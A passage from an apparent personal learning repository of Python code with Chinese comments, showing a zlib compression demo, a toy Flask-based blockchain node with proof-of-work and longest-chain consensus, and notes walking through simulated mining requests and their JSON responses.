2018/8/25 22:10 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import zlib 17 | import requests 18 | 19 | 20 | # zlib.compress 用来压缩字符串的bytes类型 21 | def str_zlib(): 22 | req = requests.get("http://python.jobbole.com/81513/") 23 | message = req.text 24 | bytes_message = str.encode(message) 25 | compressed = zlib.compress(bytes_message, zlib.Z_BEST_COMPRESSION) 26 | decompressed = zlib.decompress(compressed) # str、repr的区别 27 | print("original string:", len(message)) 28 | print("original bytes:", len(bytes_message)) 29 | print("compressed:", len(compressed)) 30 | print("decompressed:", len(decompressed)) 31 | 32 | 33 | # zlib.compressobj 用来压缩数据流,用于文件传输 34 | def file_compress(beginFile, zlibFile, level): 35 | infile = open(beginFile, "rb") 36 | zfile = open(zlibFile, "wb") 37 | compressobj = zlib.compressobj(level) # 压缩对象 38 | data = infile.read(1024) # 1024为读取的size参数 39 | while data: 40 | zfile.write(compressobj.compress(data)) # 写入压缩数据 41 | data = infile.read(1024) # 继续读取文件中的下一个size的内容 42 | zfile.write(compressobj.flush()) # compressobj.flush()包含剩余压缩输出的字节对象,将剩余的字节内容写入到目标文件中 43 | 44 | 45 | def file_decompress(zlibFile, endFile): 46 | zlibFile = open(zlibFile, "rb") 47 | endFile = open(endFile, "wb") 48 | decompressobj = zlib.decompressobj() 49 | data = zlibFile.read(1024) 50 | while data: 51 | endFile.write(decompressobj.decompress(data)) 52 | data = zlibFile.read(1024) 53 | endFile.write(decompressobj.flush()) 54 | 55 | 56 | def main(): 57 | # 测试字符串的压缩与解压 58 | str_zlib() 59 | 60 | # 测试数据流压缩 61 | beginFile = "./beginFile.txt" 62 | zlibFile = "./zlibFile.txt" 63 | level = 9 64 | file_compress(beginFile, zlibFile, level) 65 | 66 | # 测试数据流解压 67 | zlibFile = "./zlibFile.txt" 68 | endFile = "./endFile.txt" 69 | file_decompress(zlibFile, endFile) 70 | 71 | 72 | if __name__ == "__main__": 73 | main() 74 | 75 | 76 | -------------------------------------------------------------------------------- /blockchains/blockchain.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 模拟区块链 6 | -------------------------------------- 7 | @File : blockchain.py 8 | @Time : 2018/4/24 16:51 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import hashlib 17 | import json 18 | from time import time 19 | from urllib import parse 20 | from typing import Any, Dict, List, Optional 21 | from urllib.parse import urlparse 22 | from uuid import uuid4 23 | import requests 24 | from argparse import ArgumentParser 25 | 26 | # blockChain类用来管理链条,负责存储交易、加入新块等 27 | class blockChain(object): 28 | def __init__(self): 29 | self.chain = [] # 用于存储区块链 30 | self.current_transactions = [] # 用于存储交易记录 31 | self.nodes = set() # 用set来存储节点,避免重复添加节点(利用set的属性) 32 | 33 | # Create the genesis block 创建创世区块 34 | self.new_block(previous_hash = '1', proof = 100) 35 | 36 | 37 | # Creates a new block and adds it to the chain 生成新块并添加到区块链中 38 | # param proof: The proof given by the proof of work algorithm 39 | # param previous_hash: (Optional 可选) Hash of previous block 40 | # return: New block 41 | def new_block(self, proof, previous_hash: Optional[str]) -> Dict[str, Any]: 42 | # block 43 | block = { 44 | 'index': len(self.chain) + 1, 45 | 'timestamp': time(), 46 | 'transactions': self.current_transactions, 47 | 'proof': proof, 48 | 'previous_hash': previous_hash or self.hash(self.chain[-1]), 49 | } 50 | 51 | # Reset the current list of transactions 将交易加入到区块后重置交易记录。目的:在新的区块中打包记录新的交易情况,不能含有之前的交易记录 52 | self.current_transactions = [] 53 | 54 | # Add the new block to the list of chain 55 | self.chain.append(block) 56 | 57 | return block 58 | 59 | 60 | # Adds a new transaction to the list of transactions 61 | # 生成新的交易记录添加到交易列表中,新的交易记录将加入到下一个待挖的区块中,并返回该交易记录将被添加到的下一个待挖区块的索引 62 | # param sender: Address of the sender 发送者地址 63 | # param recipient: Address of the recipient 接收者地址 64 | # param amount: Amount 发送比特币的数量 65 | # return: The index of the block that will hold this transaction 66 | def new_transaction(self, sender: str, recipient: str, amount: int) -> int: 67 | self.current_transactions.append({ 68 | "sender": sender, 69 | "recipient": recipient, 70 | "amount": amount 71 | }) 72 | return self.last_block['index'] + 1 73 | 74 | 75 | # Hashes a block 生成块的SHA-256 hash值 76 | # param block: block 77 | # return: Hash 78 | @staticmethod # 静态方法 79 | def hash(block: Dict[str, Any]) -> str: 80 | block_string = json.dumps(block, sort_keys=True).encode() # 序列化列表为json字符串格式 81 | return hashlib.sha256(block_string).hexdigest() # hash.hexdigest()生成十六进制数据字符串值 82 | 83 | 84 | # Returns the last block in the chain 85 | @property # 将一个方法变成属性调用 86 | def last_block(self) -> Dict[str, Any]: 87 | return self.chain[-1] 88 | 89 | 90 | # 简单工作量证明: 寻找一个数proof,使得它与前一个区块的工作量证明值(last_proof)拼接成的字符串的 Hash 值(hash(last_proof, proof))以 4 个零开头。 91 | # param last_proof: 前一个区块的工作量证明值 92 | # return: proof 算力,工作量证明 93 | def proof_of_work(self, last_proof: int) -> int: 94 | proof = 0 95 | while self.valid_proof(last_proof, proof) is False: 96 | proof += 1 97 | return proof 98 | 99 | 100 | # 验证证明: hash(last_proof, proof)是否以四个零开头? 101 | # param last_proof: Previous proof 前一个区块的工作量证明值 102 | # param proof: Current Proof 当前区块的工作量证明值 103 | # return: True is current, false if not 104 | @staticmethod 105 | def valid_proof(last_proof: int, proof: int) -> bool: 106 | guess = f'{last_proof}{proof}'.encode() 107 | guess_hash = hashlib.sha256(guess).hexdigest() 108 | return guess_hash[:4] == "0000" 109 | 110 | 111 | # 一致性(共识):注册节点,在多个节点中添加一个新的节点 112 | # param address: Address of node. Eg. 'http://192.168.0.5:5000' 113 | # return: None 114 | def register_node(self, address): 115 | parsed_url = urlparse(address) 116 | self.nodes.add(parsed_url.netloc) # 添加节点的地址和端口号,根据urlparse解析结果 117 | 118 | 119 | # Determine if a given blockchain is valid 检查是否是有效链,遍历每个块验证hash和proof 120 | # param chain: A blockchain 区块链列表 121 | # return: True if valid, false if not 122 | def valid_chain(self, chain: List[Dict[str, Any]]) -> bool: 123 | last_block = chain[0] 124 | current_index = 1 125 | 126 | while current_index < len(chain): 127 | block = chain[current_index] 128 | print(f'{last_block}') 129 | print(f'{block}') 130 | print("\n------------------\n") 131 | 132 | # Check that the hash of the block is correct 检测当前块是否正确可用。依据:当前块的previous_hash值是否等于前一个块的hash值 133 | if block['previous_hash'] != self.hash(last_block): 134 | return False 135 | 136 | # Check that the proof of work is correct 检测工作量证明是否正确 137 | if not self.valid_proof(last_block['proof'], block['proof']): 138 | return False 139 | 140 | last_block = block 141 | current_index += 1 142 | 143 | return True 144 | 145 | 146 | # 共识算发解决冲突,使用网络中最长的链 147 | # return: 如果链被取代返回True,否则返回False 148 | def resolve_conflicts(self) -> bool: 149 | # 获取所有临近节点,nodes包含网络中的所有节点内容 150 | neighbours = self.nodes 151 | new_chain = None 152 | 153 | # We're only looking for chains longer than ours 154 | max_length = len(self.chain) 155 | 156 | # Grab and verify the chains from all the nodes in our network 157 | # 遍历所有邻居节点,并验证链的有效性,如果发现有效更长链,则替换掉自己的链 158 | for node in neighbours: 159 | response = requests.get(f'http://{node}/chain') 160 | 161 | # 对于节点池nodes中可用的节点 162 | if response.status_code == 200: 163 | length = response.json()['length'] 164 | chain = response.json()['chain'] 165 | 166 | # Check if the length of the chain is longer and the chain is valid 167 | if length > max_length and self.valid_chain(chain): 168 | max_length = length 169 | new_chain = chain 170 | 171 | # Replace our chain if we discovered a new, valid chain longer than ours 172 | if new_chain: 173 | self.chain = new_chain 174 | return True 175 | 176 | return False 177 | 178 | 179 | # ---------------------------------------------------------------------------------- 180 | 181 | 182 | # Instantiate our node 创建节点 183 | app = Flask(__name__) 184 | 185 | # Generate a globally unique address for this node 186 | node_identifier = str(uuid4()).replace('-', '') 187 | 188 | # Instantiate our node 189 | blockChain = blockChain() 190 | 191 | # 创建/transactions/new POST接口,可以给接口发送交易数据. 创建一个交易并添加到区块 192 | @app.route("/transactions/new", methods = ["POST"]) 193 | def new_transaction(): 194 | # values = request.get_json() # 无交易数据返回 195 | 196 | # test 设置静态交易返回数据 197 | values = { 198 | 'sender': '123', 199 | 'recipient': '456', 200 | 'amount': 5 201 | } 202 | 203 | # 检查必填字段是否在POST中 204 | required = ['sender', 'recipient', 'amount'] 205 | if not all(k in values for k in required): 206 | return "Missing values", 400 207 | 208 | # 新建一笔交易 209 | index = blockChain.new_transaction(values['sender'], values['recipient'], values['amount']) 210 | 211 | response = {'message': f'Transaction will be added to block {index}'} 212 | return jsonify(response), 201 213 | 214 | 215 | # 创建/chain接口,返回整个区块链 216 | @app.route("/chain", methods = ["GET"]) 217 | def full_chain(): 218 | response = { 219 | 'chain': blockChain.chain, 220 | 'length': len(blockChain.chain) 221 | } 222 | return jsonify(response), 200 223 | 224 | 225 | # 创建/mine GET接口. 告诉服务器去挖掘新的区块 226 | @app.route('/mine', methods = ['GET']) 227 | def mine(): 228 | ## 1. 运行工作证明算法以获得下一个证明,即计算工作量证明PoW。验证区块是否合格 229 | last_block = blockChain.last_block 230 | last_proof = last_block['proof'] 231 | proof = blockChain.proof_of_work(last_proof) 232 | 233 | ## 2. 系统给拥有工作量证明的节点提供奖励, 即挖到合格的区块,授予矿工比特币奖励 234 | # 发送者为"0"表明是新挖出的币 235 | blockChain.new_transaction( 236 | sender="0", 237 | recipient=node_identifier, 238 | amount=1, 239 | ) 240 | 241 | ## 3. 构造新区块并将其添加到区块链中 242 | block = blockChain.new_block(proof, None) 243 | response = { 244 | 'message': "New block forged", 245 | 'index': block['index'], 246 | 'transactions': block['transactions'], 247 | 'proof': block['proof'], 248 | 'previous_hash': block['previous_hash'], 249 | } 250 | return jsonify(response), 200 251 | 252 | 253 | # 添加路由/nodes/register POST接口,注册节点 254 | @app.route('/nodes/register', methods = ['POST']) 255 | def register_nodes(): 256 | print("begin register...") 257 | # values = request.get_json() 258 | # nodes = values.get('nodes') 259 | 260 | # test 设置假定的端口号为5001、5002 261 | nodes = ['http://192.168.2.111:5001', 262 | 'http://192.168.2.111:5000'] 263 | 264 | if nodes is None: 265 | return "Error: Please supply a valid list of nodes", 400 266 | 267 | for node in nodes: 268 | blockChain.register_node(node) 269 | 270 | response = { 271 | 'message': 'New nodes have been added', 272 | 'total_nodes': list(blockChain.nodes) 273 | } 274 | return jsonify(response), 201 275 | 276 | 277 | # 添加路由/nodes/resolve GET接口,解决冲突 278 | @app.route('/nodes/resolve', methods = ['GET']) 279 | def consensus(): 280 | print("begin resolve...") 281 | replaced = blockChain.resolve_conflicts() 282 | 283 | if replaced: 284 | response = { 285 | 'message': 'Our chain was replaced', 286 | 'new_chain': blockChain.chain, 287 | 'length': len(blockChain.chain) 288 | } 289 | else: 290 | response = { 291 | 'message': 'Our chain is authoritative', 292 | 'chain': blockChain.chain, 293 | 'length': len(blockChain.chain) 294 | } 295 | 296 | return jsonify(response), 200 297 | 298 | 299 | if __name__ == "__main__": 300 | parser = ArgumentParser() 301 | parser.add_argument('-p', '--port', default=5000, type=int, help='port to listen on') 302 | args = parser.parse_args() 303 | port = args.port 304 | 305 | # 服务运行在端口5000上 306 | app.run(host='192.168.2.111', port=5000) 307 | -------------------------------------------------------------------------------- /blockchains/blockchain_node2.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 模拟区块链结点2 6 | -------------------------------------- 7 | @File : blockchain_node1.py 8 | @Time : 2018/4/24 16:51 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import hashlib 17 | import json 18 | from time import time 19 | from urllib import parse 20 | from typing import Any, Dict, List, Optional 21 | from urllib.parse import urlparse 22 | from uuid import uuid4 23 | from flask import Flask, jsonify, request 24 | import requests 25 | from argparse import ArgumentParser 26 | 27 | # blockChain类用来管理链条,负责存储交易、加入新块等 28 | class blockChain(object): 29 | def __init__(self): 30 | self.chain = [] # 用于存储区块链 31 | self.current_transactions = [] # 用于存储交易记录 32 | self.nodes = set() # 用set来存储节点,避免重复添加节点(利用set的属性) 33 | 34 | # Create the genesis block 创建创世区块 35 | self.new_block(previous_hash = '1', proof = 100) 36 | 37 | 38 | # Creates a new block and adds it to the chain 生成新块并添加到区块链中 39 | # param proof: The proof given by the proof of work algorithm 40 | # param previous_hash: (Optional 可选) Hash of previous block 41 | # return: New block 42 | def new_block(self, proof, previous_hash: Optional[str]) -> Dict[str, Any]: 43 | # block 44 | block = { 45 | 'index': len(self.chain) + 1, 46 | 'timestamp': time(), 47 | 'transactions': self.current_transactions, 48 | 'proof': proof, 49 | 'previous_hash': previous_hash or self.hash(self.chain[-1]), 50 | } 51 | 52 | # Reset the current list of transactions 将交易加入到区块后重置交易记录。目的:在新的区块中打包记录新的交易情况,不能含有之前的交易记录 53 | self.current_transactions = [] 54 | 55 | # Add the new block to the list of chain 56 | self.chain.append(block) 57 | 58 | return block 59 | 60 | 61 | # Adds a new transaction to the list of transactions 62 | # 生成新的交易记录添加到交易列表中,新的交易记录将加入到下一个待挖的区块中,并返回该交易记录将被添加到的下一个待挖区块的索引 63 | # param sender: Address of the sender 发送者地址 64 | # param recipient: Address of the recipient 接收者地址 65 | # param amount: Amount 发送比特币的数量 66 | # return: The index of the block that will hold this transaction 67 | def new_transaction(self, sender: str, recipient: str, amount: int) -> int: 68 | self.current_transactions.append({ 69 | "sender": sender, 70 | "recipient": recipient, 71 | "amount": amount 72 | }) 73 | return self.last_block['index'] + 1 74 | 75 | 76 | # Hashes a block 生成块的SHA-256 hash值 77 | # param block: block 78 | # return: Hash 79 | @staticmethod # 静态方法 80 | def hash(block: Dict[str, Any]) -> str: 81 | block_string = json.dumps(block, sort_keys=True).encode() # 序列化列表为json字符串格式 82 | return hashlib.sha256(block_string).hexdigest() # hash.hexdigest()生成十六进制数据字符串值 83 | 84 | 85 | # Returns the last block in the chain 86 | @property # 将一个方法变成属性调用 87 | def last_block(self) -> Dict[str, Any]: 88 | return self.chain[-1] 89 | 90 | 91 | # 简单工作量证明: 寻找一个数p,使得它与前一个区块的工作量证明值(proof)拼接成的字符串的 Hash 值(hash(last_proof, proof))以 4 个零开头。 92 | # param last_proof: 前一个区块的工作量证明值 93 | # return: proof 算力,工作量证明 94 | def proof_of_work(self, last_proof: int) -> int: 95 | proof = 0 96 | while self.valid_proof(last_proof, proof) is False: 97 | proof += 1 98 | return proof 99 | 100 | 101 | # 验证证明: hash(last_proof, proof)是否以四个零开头? 102 | # param last_proof: Previous proof 前一个区块的工作量证明值 103 | # param proof: Current Proof 当前区块的工作量证明值 104 | # return: True is current, false if not 105 | @staticmethod 106 | def valid_proof(last_proof: int, proof: int) -> bool: 107 | guess = f'{last_proof}{proof}'.encode() 108 | guess_hash = hashlib.sha256(guess).hexdigest() 109 | return guess_hash[:4] == "0000" 110 | 111 | 112 | # 一致性(共识):注册节点,在多个节点中添加一个新的节点 113 | # param address: Address of node. Eg. 'http://192.168.0.5:5000' 114 | # return: None 115 | def register_node(self, address): 116 | parsed_url = urlparse(address) 117 | self.nodes.add(parsed_url.netloc) # 添加节点的地址和端口号,根据urlparse解析结果 118 | 119 | 120 | # Determine if a given blockchain is valid 检查是否是有效链,遍历每个块验证hash和proof 121 | # param chain: A blockchain 区块链列表 122 | # return: True if valid, false if not 123 | def valid_chain(self, chain: List[Dict[str, Any]]) -> bool: 124 | last_block = chain[0] 125 | current_index = 1 126 | 127 | while current_index < len(chain): 128 | block = chain[current_index] 129 | print(f'{last_block}') 130 | print(f'{block}') 131 | print("\n------------------\n") 132 | 133 | # Check that the hash of the block is correct 检测当前块是否正确可用。依据:当前块的previous_hash值是否等于前一个块的hash值 134 | if block['previous_hash'] != self.hash(last_block): 135 | return False 136 | 137 | # Check that the proof of work is correct 检测工作量证明是否正确 138 | if not self.valid_proof(last_block['proof'], block['proof']): 139 | return False 140 | 141 | last_block = block 142 | current_index += 1 143 | 144 | return True 145 | 146 | 147 | # 共识算发解决冲突,使用网络中最长的链 148 | # return: 如果链被取代返回True,否则返回False 149 | def resolve_conflicts(self) -> bool: 150 | # 获取所有临近节点,nodes包含网络中的所有节点内容 151 | neighbours = self.nodes 152 | new_chain = None 153 | 154 | # We're only looking for chains longer than ours 155 | max_length = len(self.chain) 156 | 157 | # Grab and verify the chains from all the nodes in our network 158 | # 遍历所有邻居节点,并验证链的有效性,如果发现有效更长链,则替换掉自己的链 159 | for node in neighbours: 160 | response = requests.get(f'http://{node}/chain') 161 | 162 | # 对于节点池nodes中可用的节点 163 | if response.status_code == 200: 164 | length = response.json()['length'] 165 | chain = response.json()['chain'] 166 | 167 | # Check if the length of the chain is longer and the chain is valid 168 | if length > max_length and self.valid_chain(chain): 169 | max_length = length 170 | new_chain = chain 171 | 172 | # Replace our chain if we discovered a new, valid chain longer than ours 173 | if new_chain: 174 | self.chain = new_chain 175 | return True 176 | 177 | return False 178 | 179 | 180 | # ---------------------------------------------------------------------------------- 181 | 182 | 183 | # Instantiate our node 创建节点 184 | app = Flask(__name__) 185 | 186 | # Generate a globally unique address for this node 187 | node_identifier = str(uuid4()).replace('-', '') 188 | 189 | # Instantiate our node 190 | blockChain = blockChain() 191 | 192 | # 创建/transactions/new POST接口,可以给接口发送交易数据. 创建一个交易并添加到区块 193 | @app.route("/transactions/new", methods = ["POST"]) 194 | def new_transaction(): 195 | # values = request.get_json() # 无交易数据返回 196 | 197 | # test 设置静态交易返回数据 198 | values = { 199 | 'sender': '123', 200 | 'recipient': '456', 201 | 'amount': 5 202 | } 203 | 204 | # 检查必填字段是否在POST中 205 | required = ['sender', 'recipient', 'amount'] 206 | if not all(k in values for k in required): 207 | return "Missing values", 400 208 | 209 | # 新建一笔交易 210 | index = blockChain.new_transaction(values['sender'], values['recipient'], values['amount']) 211 | 212 | response = {'message': f'Transaction will be added to block {index}'} 213 | return jsonify(response), 201 214 | 215 | 216 | # 创建/chain接口,返回整个区块链 217 | @app.route("/chain", methods = ["GET"]) 218 | def full_chain(): 219 | response = { 220 | 'chain': blockChain.chain, 221 | 'length': len(blockChain.chain) 222 | } 223 | return jsonify(response), 200 224 | 225 | 226 | # 创建/mine GET接口. 告诉服务器去挖掘新的区块 227 | @app.route('/mine', methods = ['GET']) 228 | def mine(): 229 | ## 1. 运行工作证明算法以获得下一个证明,即计算工作量证明PoW。验证区块是否合格 230 | last_block = blockChain.last_block 231 | last_proof = last_block['proof'] 232 | proof = blockChain.proof_of_work(last_proof) 233 | 234 | ## 2. 系统给拥有工作量证明的节点提供奖励, 即挖到合格的区块,授予矿工比特币奖励 235 | # 发送者为"0"表明是新挖出的币 236 | blockChain.new_transaction( 237 | sender="0", 238 | recipient=node_identifier, 239 | amount=1, 240 | ) 241 | 242 | ## 3. 构造新区块并将其添加到区块链中 243 | block = blockChain.new_block(proof, None) 244 | response = { 245 | 'message': "New block forged", 246 | 'index': block['index'], 247 | 'transactions': block['transactions'], 248 | 'proof': block['proof'], 249 | 'previous_hash': block['previous_hash'], 250 | } 251 | return jsonify(response), 200 252 | 253 | 254 | # 添加路由/nodes/register POST接口,注册节点 255 | @app.route('/nodes/register', methods = ['POST']) 256 | def register_nodes(): 257 | print("begin register...") 258 | # values = request.get_json() 259 | # nodes = values.get('nodes') # 无返回结果 260 | 261 | # test 设置假定的端口号为5021、5022;假定端口号第三位的2对应此文件node2 262 | nodes = ['http://192.168.2.111:5001', 263 | 'http://192.168.2.111:5002', 264 | 'http://192.168.2.111:5003'] 265 | 266 | if nodes is None: 267 | return "Error: Please supply a valid list of nodes", 400 268 | 269 | for node in nodes: 270 | blockChain.register_node(node) 271 | 272 | response = { 273 | 'message': 'New nodes have been added', 274 | 'total_nodes': list(blockChain.nodes) 275 | } 276 | return jsonify(response), 201 277 | 278 | 279 | # 添加路由/nodes/resolve GET接口,解决冲突 280 | @app.route('/nodes/resolve', methods = ['GET']) 281 | def consensus(): 282 | print("begin resolve...") 283 | replaced = blockChain.resolve_conflicts() 284 | 285 | if replaced: 286 | response = { 287 | 'message': 'Our chain was replaced', 288 | 'new_chain': blockChain.chain, 289 | 'length': len(blockChain.chain) 290 | } 291 | else: 292 | response = { 293 | 'message': 'Our chain is authoritative', 294 | 'chain': blockChain.chain, 295 | 'length': len(blockChain.chain) 296 | } 297 | 298 | return jsonify(response), 200 299 | 300 | 301 | if __name__ == "__main__": 302 | parser = ArgumentParser() 303 | parser.add_argument('-p', '--port', default=5000, type=int, help='port to listen on') 304 | args = parser.parse_args() 305 | port = args.port 306 | 307 | # 服务运行在端口5002上 308 | app.run(host='192.168.2.111', port=5003) 309 | -------------------------------------------------------------------------------- /blockchains/待解决问题.txt: -------------------------------------------------------------------------------- 1 | 0. 解决已有问题 2 | 问题:request没有内容 3 | 方法:设置静态的返回内容(解决方式暂定) 4 | 5 | 包含技术点: 6 | 1. @staticmethod @property 7 | 2. hash.hexdigest() hash.sha256 8 | 3. json.dumps 9 | 4. uuid4() 10 | 5. flask框架 11 | 12 | set()属性存储节点 13 | 14 | from typing import Any, Dict, List, Optional 15 | new_block(self, proof, previous_hash: Optional[str]) -> Dict[str, Any] 16 | def new_transaction(self, sender: str, recipient: str, amount: int) -> int 17 | 18 | guess = f'{last_proof}{proof}'.encode() f'{}{}' 19 | 20 | urlparse 21 | 22 | jsonify(response) 23 | 24 | 400 201 200 25 | 26 | node_identifier = str(uuid4()).replace('-', '') 27 | -------------------------------------------------------------------------------- /blockchains/模拟挖矿过程.txt: -------------------------------------------------------------------------------- 1 | 2 | 模拟挖矿的整体过程: 3 | 1. 访问链接 http://192.168.2.111:5000/chain,查看创世区块的主要内容,如下: 4 | 其中,包括创世区块的索引为1,设定的hash、proof,时间戳,为空的交易记录。 5 | { 6 | "chain": [ 7 | { 8 | "index": 1, 9 | "previous_hash": "1", 10 | "proof": 100, 11 | "timestamp": 1524207612.618698, 12 | "transactions": [] 13 | } 14 | ], 15 | "length": 1 16 | } 17 | 18 | 2,访问链接 http://192.168.2.111:5000/mine,查看新建区块的主要内容,如下: 19 | 其中,包括新建区块的索引为2,新加入的区块消息"New block forged",上一个区块的hash值,计算出当前区块的算力(工作量证明)proof=35293, 20 | 交易记录为transactions,由于只是模拟新建区块的情况,没有添加具体的交易内容,只有完成挖矿对矿工的奖励交易信息,即sender=0的交易记录。 21 | { 22 | "index": 2, 23 | "previous_hash": "b3bdbdb4b95b3f7a96b17bf3843af0ac22ebabc993490b594ccf10d82fa90b2e", 24 | "proof": 35293, 25 | "timestamp": 1524207627.0737095, 26 | "transactions": [ 27 | { 28 | "amount": 1, 29 | "recipient": "fc30a002579d4c159538353a9a267d97", 30 | "sender": "0" 31 | } 32 | ] 33 | } 34 | 35 | 3. 再次访问链接 http://192.168.2.111:5000/chain,再次查看区块链的主要内容,结果如下: 36 | 可以看到,此时的区块链已经包含创世区块(index=1)以及刚添加的区块(index=2),区块链的长度"length": 2 37 | { 38 | "chain": [ 39 | { 40 | "index": 1, 41 | "previous_hash": "1", 42 | "proof": 100, 43 | "timestamp": 1524207612.618698, 44 | "transactions": [] 45 | }, 46 | { 47 | "index": 2, 48 | "previous_hash": "b3bdbdb4b95b3f7a96b17bf3843af0ac22ebabc993490b594ccf10d82fa90b2e", 49 | "proof": 35293, 50 | "timestamp": 1524207627.0737095, 51 | "transactions": [ 52 | { 53 | "amount": 1, 54 | "recipient": "fc30a002579d4c159538353a9a267d97", 55 | "sender": "0" 56 | } 57 | ] 58 | } 59 | ], 60 | "length": 2 61 | } 62 | 63 | 4. 访问链接 http://192.168.2.111:5000/transactions/new,即新建交易,结果如下: 64 | { 65 | "message": "Transaction will be added to block 3" 66 | } 67 | 即新建的交易信息会被添加到block 3 的区块中包装。 68 | 69 | 5. 继续访问链接 http://192.168.2.111:5000/transactions/new,再次新建交易,结果如下: 70 | { 71 | "message": "Transaction will be added to block 3" 72 | } 73 | 即新建的不同的交易信息,会被再次添加到block 3 的区块中包装。 74 | 75 | 6. 访问链接 http://192.168.2.111:5000/mine,将第四步、第五步生成的交易信息添加到区块中,即block 3 中。结果如下: 76 | 其中,包括新建区块的索引为3,新加入的区块消息"New block forged"。上一个区块的hash值,计算出当前区块的算力(工作量证明)proof=35089, 77 | 此时的交易记录中,包含第四步、第五步生成的交易信息,即transactions中的前两个交易记录。 78 | 最后也包含系统对矿工的奖励交易信息,即sender=0交易记录。 79 | { 80 | "index": 3, 81 | "message": "New block forged", 82 | "previous_hash": "cc8e7dfd9c448a401468384a83667669bcd8f654722882cd0106c26de5c96fbe", 83 | "proof": 35089, 84 | "transactions": [ 85 | { 86 | "amount": 5, 87 | "recipient": "456", 88 | "sender": "123" 89 | }, 90 | { 91 | "amount": 5, 92 | "recipient": "456", 93 | "sender": "123" 94 | }, 95 | { 96 | "amount": 1, 97 | "recipient": "fc30a002579d4c159538353a9a267d97", 98 | "sender": "0" 99 | } 100 | ] 101 | } 102 | 103 | 7. 访问链接 http://192.168.2.111:5000/chain,查看此时的区块链的内容,结果如下: 104 | 可以看到,经过创建创世区块(index=1)、添加无交易信息的空区块(index=2)、添加两个交易信息的区块(index=3),整个区块链的长度达到3. 105 | { 106 | "chain": [ 107 | { 108 | "index": 1, 109 | "previous_hash": "1", 110 | "proof": 100, 111 | "timestamp": 1524207612.618698, 112 | "transactions": [] 113 | }, 114 | { 115 | "index": 2, 116 | "previous_hash": "b3bdbdb4b95b3f7a96b17bf3843af0ac22ebabc993490b594ccf10d82fa90b2e", 117 | "proof": 35293, 118 | "timestamp": 1524207627.0737095, 119 | "transactions": [ 120 | { 121 | "amount": 1, 122 | "recipient": "fc30a002579d4c159538353a9a267d97", 123 | "sender": "0" 124 | } 125 | ] 126 | }, 127 | { 128 | "index": 3, 129 | "previous_hash": "cc8e7dfd9c448a401468384a83667669bcd8f654722882cd0106c26de5c96fbe", 130 | "proof": 35089, 131 | "timestamp": 1524207930.704413, 132 | "transactions": [ 133 | { 134 | "amount": 5, 135 | "recipient": "456", 136 | "sender": "123" 137 | }, 138 | { 139 | "amount": 5, 140 | "recipient": "456", 141 | "sender": "123" 142 | }, 143 | { 144 | "amount": 1, 145 | "recipient": "fc30a002579d4c159538353a9a267d97", 146 | "sender": "0" 147 | } 148 | ] 149 | } 150 | ], 151 | "length": 3 152 | } 153 | 154 | # 添加路由解决冲突问题 155 | 8. 在三个文件(blockchain.py, blockchain_node1.py, blockchain_node2.py)中,设定对应的节点及其端口号。 156 | 在pycharm中,依次运行三个文件,结果如下: 157 | * Running on http://192.168.2.111:5000/ (Press CTRL+C to quit) 158 | * Running on http://192.168.2.111:5001/ (Press CTRL+C to quit) 159 | * Running on http://192.168.2.111:5002/ (Press CTRL+C to quit) 160 | 161 | 9. 在Postman中依次打开三个窗口,模拟三个节点的发送请求。 162 | http://192.168.2.111:5000/chain GET方式; 163 | http://192.168.2.111:5001/chain GET方式; 164 | http://192.168.2.111:5002/chain GET方式; 165 | 166 | 10. 在第一个窗口(5001)中,模拟挖出三个区块,即 http://192.168.2.111:5001/mine GET方式 发送三次请求。 167 | 在访问http://192.168.2.111:5001/chain,得到结果如下: 168 | { 169 | "chain": [ 170 | { 171 | "index": 1, 172 | "previous_hash": "1", 173 | "proof": 100, 174 | "timestamp": 1524636695.0677617, 175 | "transactions": [] 176 | }, 177 | { 178 | "index": 2, 179 | "previous_hash": "413186ba30bc4706a94212b8837afc9a06064eabeb8d999d53f74b0280c9949a", 180 | "proof": 35293, 181 | "timestamp": 1524636713.2794747, 182 | "transactions": [ 183 | { 184 | "amount": 1, 185 | "recipient": "db044e87361d42d6bb36a118da23cc4a", 186 | "sender": "0" 187 | } 188 | ] 189 | }, 190 | { 191 | "index": 3, 192 | "previous_hash": "5adc8d4cef47df9969d0d62a99290e5b0779b57b8c3582031974bf102b422f2c", 193 | "proof": 35089, 194 | "timestamp": 1524636714.5593677, 195 | "transactions": [ 196 | { 197 | "amount": 1, 198 | "recipient": "db044e87361d42d6bb36a118da23cc4a", 199 | "sender": "0" 200 | } 201 | ] 202 | }, 203 | { 204 | "index": 4, 205 | "previous_hash": "3b552f1fbc39f5cd8a8327d41351d0c083211e7943b2f8ef97b6155654912898", 206 | "proof": 119678, 207 | "timestamp": 1524636715.4139643, 208 | "transactions": [ 209 | { 210 | "amount": 1, 211 | "recipient": "db044e87361d42d6bb36a118da23cc4a", 212 | "sender": "0" 213 | } 214 | ] 215 | } 216 | ], 217 | "length": 4 218 | } 219 | 220 | 11. 在第二个窗口(5002)中,模拟挖出两个区块,即 http://192.168.2.111:5002/mine GET方式 发送两次请求。 221 | 在访问http://192.168.2.111:5002/chain,得到结果如下: 222 | { 223 | "chain": [ 224 | { 225 | "index": 1, 226 | "previous_hash": "1", 227 | "proof": 100, 228 | "timestamp": 1524636760.722611, 229 | "transactions": [] 230 | }, 231 | { 232 | "index": 2, 233 | "previous_hash": "acb63047662a741fda3195fc765b6d2fb5c124e5c4e90172ec9b437a148969bf", 234 | "proof": 35293, 235 | "timestamp": 1524636768.9283345, 236 | "transactions": [ 237 | { 238 | "amount": 1, 239 | "recipient": "6cbb4b7f8738471b9c33b0db0bddf8d8", 240 | "sender": "0" 241 | } 242 | ] 243 | }, 244 | { 245 | "index": 3, 246 | "previous_hash": "d14b77ee468e18f30da685bf7e8caa9ff201b20bd791d6174d7eaba898f59013", 247 | "proof": 35089, 248 | "timestamp": 1524636769.9380262, 249 | "transactions": [ 250 | { 251 | 